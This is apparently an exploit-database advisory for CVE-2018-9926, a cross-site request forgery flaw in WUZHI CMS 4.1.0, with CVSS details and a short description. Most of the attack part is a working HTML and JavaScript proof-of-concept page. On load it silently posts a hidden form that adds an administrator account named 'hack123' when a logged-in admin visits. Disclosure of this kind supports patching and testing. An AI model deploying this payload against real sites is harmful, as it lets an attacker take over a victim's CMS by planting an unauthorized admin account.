WUZHI CMS 4.1.0 Cross-Site Request Forgery (Add Admin User)

2018.04.11
Credit: taoge
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2018-9926
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account # Date: 2018-04-10 # Exploit Author: taoge # Vendor Homepage: https://github.com/wuzhicms/wuzhicms # Software Link: https://github.com/wuzhicms/wuzhicms # Version: 4.1.0 # CVE : CVE-2018-9926 An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128) There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add. After the administrator logged in, open the csrf exp page. <html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += "<input type='hidden' name='form[role][]' value='1' />"; fields += "<input type='hidden' name='form[username]' value='hack123' />"; fields += "<input type='hidden' name='form[password]' value='' />"; fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top